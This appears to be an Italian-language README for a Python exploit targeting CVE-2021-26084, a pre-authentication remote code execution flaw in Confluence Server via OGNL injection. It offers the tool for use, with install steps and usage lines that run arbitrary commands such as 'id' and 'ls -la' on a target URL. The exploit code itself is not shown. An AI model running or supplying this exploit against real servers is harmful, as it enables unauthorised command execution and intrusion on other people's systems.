
Exploit Python per CVE-2021-26084 che mira all'esecuzione remota di codice pre-autenticazione su Confluence Server tramite iniezione OGNL. Esegue comandi arbitrari su istanze vulnerabili.
CVE-2021-26084 - Confluence Pre-Auth RCE | Iniezione OGNL
pip3 install -r requirements.txt
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'